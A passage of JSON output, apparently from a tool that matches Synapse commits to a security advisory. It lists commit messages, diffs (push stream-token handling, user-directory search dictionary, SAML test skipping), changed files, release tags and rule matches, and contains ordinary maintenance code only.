"v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8829, 8829", - "relevance": 32 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8829, 8663, 8810", - "relevance": 2 - } - ] - }, - { - "commit_id": "b3a4b53587108af7c58acc45a0441304689f3ac9", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608046894, - "hunks": 12, - "message": "Fix handling of stream tokens for push. (#8943) Removes faulty assertions and fixes the logic to ensure the max stream token is always set.", - "diff": [ - "diff --git a/changelog.d/8943.misc b/changelog.d/8943.misc", - "new file mode 100644", - "index 000000000..4ff0b94b9", - "--- /dev/null", - "+++ b/changelog.d/8943.misc", - "@@ -0,0 +1 @@", - "+Add type hints to push module.", - "diff --git a/synapse/push/__init__.py b/synapse/push/__init__.py", - "index 3d2e87483..ad07ee86f 100644", - "--- a/synapse/push/__init__.py", - "+++ b/synapse/push/__init__.py", - "@@ -16,3 +16,3 @@", - " import abc", - "-from typing import TYPE_CHECKING, Any, Dict, Optional", - "+from typing import TYPE_CHECKING, Any, Dict", - "@@ -38,8 +38,17 @@ class Pusher(metaclass=abc.ABCMeta):", - " # should honour this rather than just looking for anything higher", - "- # because of potential out-of-order event serialisation. This starts", - "- # off as None though as we don't know any better.", - "- self.max_stream_ordering = None # type: Optional[int]", - "+ # because of potential out-of-order event serialisation.", - "+ self.max_stream_ordering = self.store.get_room_max_stream_ordering()", - "- @abc.abstractmethod", - " def on_new_notifications(self, max_token: RoomStreamToken) -> None:", - "+ # We just use the minimum stream ordering and ignore the vector clock", - "+ # component. This is safe to do as long as we *always* ignore the vector", - "+ # clock components.", - "+ max_stream_ordering = max_token.stream", - "+", - "+ self.max_stream_ordering = max(max_stream_ordering, self.max_stream_ordering)", - "+ self._start_processing()", - "+", - "+ @abc.abstractmethod", - "+ def _start_processing(self):", - "+ \"\"\"Start processing push notifications.\"\"\"", - " raise NotImplementedError()", - "diff --git a/synapse/push/emailpusher.py b/synapse/push/emailpusher.py", - "index 64a35c199..11a97b8df 100644", - "--- a/synapse/push/emailpusher.py", - "+++ b/synapse/push/emailpusher.py", - "@@ -24,3 +24,2 @@ from synapse.push import Pusher", - " from synapse.push.mailer import Mailer", - "-from synapse.types import RoomStreamToken", - "@@ -95,16 +94,2 @@ class EmailPusher(Pusher):", - "- def on_new_notifications(self, max_token: RoomStreamToken) -> None:", - "- # We just use the minimum stream ordering and ignore the vector clock", - "- # component. This is safe to do as long as we *always* ignore the vector", - "- # clock components.", - "- max_stream_ordering = max_token.stream", - "-", - "- if self.max_stream_ordering:", - "- self.max_stream_ordering = max(", - "- max_stream_ordering, self.max_stream_ordering", - "- )", - "- else:", - "- self.max_stream_ordering = max_stream_ordering", - "- self._start_processing()", - "-", - " def on_new_receipts(self, min_stream_id: int, max_stream_id: int) -> None:", - "@@ -174,3 +159,2 @@ class EmailPusher(Pusher):", - " start = 0 if INCLUDE_ALL_UNREAD_NOTIFS else self.last_stream_ordering", - "- assert self.max_stream_ordering is not None", - " unprocessed = await self.store.get_unread_push_actions_for_user_in_range_for_email(", - "diff --git a/synapse/push/httppusher.py b/synapse/push/httppusher.py", - "index 5408aa129..e8b25bcd2 100644", - "--- a/synapse/push/httppusher.py", - "+++ b/synapse/push/httppusher.py", - "@@ -28,3 +28,2 @@ from synapse.metrics.background_process_metrics import run_as_background_process", - " from synapse.push import Pusher, PusherConfigException", - "-from synapse.types import RoomStreamToken", - "@@ -124,13 +123,2 @@ class HttpPusher(Pusher):", - "- def on_new_notifications(self, max_token: RoomStreamToken) -> None:", - "- # We just use the minimum stream ordering and ignore the vector clock", - "- # component. This is safe to do as long as we *always* ignore the vector", - "- # clock components.", - "- max_stream_ordering = max_token.stream", - "-", - "- self.max_stream_ordering = max(", - "- max_stream_ordering, self.max_stream_ordering or 0", - "- )", - "- self._start_processing()", - "-", - " def on_new_receipts(self, min_stream_id: int, max_stream_id: int) -> None:", - "@@ -194,6 +182,3 @@ class HttpPusher(Pusher):", - " \"\"\"", - "-", - "- fn = self.store.get_unread_push_actions_for_user_in_range_for_http", - "- assert self.max_stream_ordering is not None", - "- unprocessed = await fn(", - "+ unprocessed = await self.store.get_unread_push_actions_for_user_in_range_for_http(", - " self.user_id, self.last_stream_ordering, self.max_stream_ordering", - "diff --git a/synapse/push/pusherpool.py b/synapse/push/pusherpool.py", - "index 9fcc0b8a6..9c12d81cf 100644", - "--- a/synapse/push/pusherpool.py", - "+++ b/synapse/push/pusherpool.py", - "@@ -131,5 +131,4 @@ class PusherPool:", - " # create the pusher setting last_stream_ordering to the current maximum", - "- # stream ordering in event_push_actions, so it will process", - "- # pushes from this point onwards.", - "- last_stream_ordering = await self.store.get_latest_push_action_stream_ordering()", - "+ # stream ordering, so it will process pushes from this point onwards.", - "+ last_stream_ordering = self.store.get_room_max_stream_ordering()", - "diff --git a/synapse/storage/databases/main/event_push_actions.py b/synapse/storage/databases/main/event_push_actions.py", - "index 2e56dfaf3..e5c03cc60 100644", - "--- a/synapse/storage/databases/main/event_push_actions.py", - "+++ b/synapse/storage/databases/main/event_push_actions.py", - "@@ -896,12 +896,2 @@ class EventPushActionsStore(EventPushActionsWorkerStore):", - "- async def get_latest_push_action_stream_ordering(self):", - "- def f(txn):", - "- txn.execute(\"SELECT MAX(stream_ordering) FROM event_push_actions\")", - "- return txn.fetchone()", - "-", - "- result = await self.db_pool.runInteraction(", - "- \"get_latest_push_action_stream_ordering\", f", - "- )", - "- return result[0] or 0", - "-", - " def _remove_old_push_actions_before_txn(" - ], - "changed_files": [ - "changelog.d/8943.misc", - "synapse/push/__init__.py", - "synapse/push/emailpusher.py", - "synapse/push/httppusher.py", - "synapse/push/pusherpool.py", - "synapse/storage/databases/main/event_push_actions.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8943": "" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8943, 8943", - "relevance": 32 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8943", - "relevance": 2 - } - ] - }, - { - "commit_id": "f2783fc201edaa49eafd8be06f8cda16ec1f3d95", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608212550, - "hunks": 10, - "message": "Use the simple dictionary in full text search for the user directory (#8959) * Use the simple dictionary in fts for the user directory * Clarify naming", - "diff": [ - "diff --git a/changelog.d/8959.bugfix b/changelog.d/8959.bugfix", - "new file mode 100644", - "index 000000000..772818bae", - "--- /dev/null", - "+++ b/changelog.d/8959.bugfix", - "@@ -0,0 +1 @@", - "+Fix a bug causing common English words to not be considered for a user directory search.", - "diff --git a/synapse/storage/databases/main/user_directory.py b/synapse/storage/databases/main/user_directory.py", - "index fc8caf46a..ef11f1c3b 100644", - "--- a/synapse/storage/databases/main/user_directory.py", - "+++ b/synapse/storage/databases/main/user_directory.py", - "@@ -398,5 +398,5 @@ class UserDirectoryBackgroundUpdateStore(StateDeltasStore):", - " VALUES (?,", - "- setweight(to_tsvector('english', ?), 'A')", - "- || setweight(to_tsvector('english', ?), 'D')", - "- || setweight(to_tsvector('english', COALESCE(?, '')), 'B')", - "+ setweight(to_tsvector('simple', ?), 'A')", - "+ || setweight(to_tsvector('simple', ?), 'D')", - "+ || setweight(to_tsvector('simple', COALESCE(?, '')), 'B')", - " ) ON CONFLICT (user_id) DO UPDATE SET vector=EXCLUDED.vector", - "@@ -420,5 +420,5 @@ class UserDirectoryBackgroundUpdateStore(StateDeltasStore):", - " VALUES (?,", - "- setweight(to_tsvector('english', ?), 'A')", - "- || setweight(to_tsvector('english', ?), 'D')", - "- || setweight(to_tsvector('english', COALESCE(?, '')), 'B')", - "+ setweight(to_tsvector('simple', ?), 'A')", - "+ || setweight(to_tsvector('simple', ?), 'D')", - "+ || setweight(to_tsvector('simple', COALESCE(?, '')), 'B')", - " )", - "@@ -437,5 +437,5 @@ class UserDirectoryBackgroundUpdateStore(StateDeltasStore):", - " UPDATE user_directory_search", - "- SET vector = setweight(to_tsvector('english', ?), 'A')", - "- || setweight(to_tsvector('english', ?), 'D')", - "- || setweight(to_tsvector('english', COALESCE(?, '')), 'B')", - "+ SET vector = setweight(to_tsvector('simple', ?), 'A')", - "+ || setweight(to_tsvector('simple', ?), 'D')", - "+ || setweight(to_tsvector('simple', COALESCE(?, '')), 'B')", - " WHERE user_id = ?", - "@@ -766,3 +766,3 @@ class UserDirectoryStore(UserDirectoryBackgroundUpdateStore):", - " %s", - "- AND vector @@ to_tsquery('english', ?)", - "+ AND vector @@ to_tsquery('simple', ?)", - " ORDER BY", - "@@ -775,3 +775,3 @@ class UserDirectoryStore(UserDirectoryBackgroundUpdateStore):", - " vector,", - "- to_tsquery('english', ?),", - "+ to_tsquery('simple', ?),", - " 8", - "@@ -781,3 +781,3 @@ class UserDirectoryStore(UserDirectoryBackgroundUpdateStore):", - " vector,", - "- to_tsquery('english', ?),", - "+ to_tsquery('simple', ?),", - " 8", - "diff --git a/tests/storage/test_user_directory.py b/tests/storage/test_user_directory.py", - "index 738e91246..a6f63f4aa 100644", - "--- a/tests/storage/test_user_directory.py", - "+++ b/tests/storage/test_user_directory.py", - "@@ -23,2 +23,4 @@ BOB = \"@bob:b\"", - " BOBBY = \"@bobby:a\"", - "+# The localpart isn't 'Bela' on purpose so we can test looking up display names.", - "+BELA = \"@somenickname:a\"", - "@@ -42,2 +44,5 @@ class UserDirectoryStoreTestCase(unittest.TestCase):", - " )", - "+ yield defer.ensureDeferred(", - "+ self.store.update_profile_in_user_dir(BELA, \"Bela\", None)", - "+ )", - " yield defer.ensureDeferred(", - "@@ -74 +79,19 @@ class UserDirectoryStoreTestCase(unittest.TestCase):", - " self.hs.config.user_directory_search_all_users = False", - "+", - "+ @defer.inlineCallbacks", - "+ def test_search_user_dir_stop_words(self):", - "+ \"\"\"Tests that a user can look up another user by searching for the start if its", - "+ display name even if that name happens to be a common English word that would", - "+ usually be ignored in full text searches.", - "+ \"\"\"", - "+ self.hs.config.user_directory_search_all_users = True", - "+ try:", - "+ r = yield defer.ensureDeferred(self.store.search_user_dir(ALICE, \"be\", 10))", - "+ self.assertFalse(r[\"limited\"])", - "+ self.assertEqual(1, len(r[\"results\"]))", - "+ self.assertDictEqual(", - "+ r[\"results\"][0],", - "+ {\"user_id\": BELA, \"display_name\": \"Bela\", \"avatar_url\": None},", - "+ )", - "+ finally:", - "+ self.hs.config.user_directory_search_all_users = False" - ], - "changed_files": [ - "changelog.d/8959.bugfix", - "synapse/storage/databases/main/user_directory.py", - "tests/storage/test_user_directory.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8959": "User directory search fails for certain letters #2931 User directory won't consider non-new users with stop words in their names #8974" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8959, 8959", - "relevance": 32 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8959", - "relevance": 2 - } - ] - }, - { - "commit_id": "6ff34e00d9bd4e8b0b91347a359b17abeaa22e5a", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607534610, - "hunks": 3, - "message": "Skip the SAML tests if xmlsec1 isn't available. (#8905)", - "diff": [ - "diff --git a/changelog.d/8905.misc b/changelog.d/8905.misc", - "new file mode 100644", - "index 000000000..a9a11a230", - "--- /dev/null", - "+++ b/changelog.d/8905.misc", - "@@ -0,0 +1 @@", - "+Skip the SAML tests if the requirements (`pysaml2` and `xmlsec1`) aren't available.", - "diff --git a/tests/handlers/test_saml.py b/tests/handlers/test_saml.py", - "index 45dc17aba..d21e5588c 100644", - "--- a/tests/handlers/test_saml.py", - "+++ b/tests/handlers/test_saml.py", - "@@ -21,2 +21,20 @@ from tests.unittest import HomeserverTestCase, override_config", - "+# Check if we have the dependencies to run the tests.", - "+try:", - "+ import saml2.config", - "+ from saml2.sigver import SigverError", - "+", - "+ has_saml2 = True", - "+", - "+ # pysaml2 can be installed and imported, but might not be able to find xmlsec1.", - "+ config = saml2.config.SPConfig()", - "+ try:", - "+ config.load({\"metadata\": {}})", - "+ has_xmlsec1 = True", - "+ except SigverError:", - "+ has_xmlsec1 = False", - "+except ImportError:", - "+ has_saml2 = False", - "+ has_xmlsec1 = False", - "+", - " # These are a few constants that are used as config parameters in the tests.", - "@@ -88,2 +106,7 @@ class SamlHandlerTestCase(HomeserverTestCase):", - "+ if not has_saml2:", - "+ skip = \"Requires pysaml2\"", - "+ elif not has_xmlsec1:", - "+ skip = \"Requires xmlsec1\"", - "+", - " def test_map_saml_response_to_user(self):" - ], - "changed_files": [ - "changelog.d/8905.misc", - "tests/handlers/test_saml.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8905": "" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - 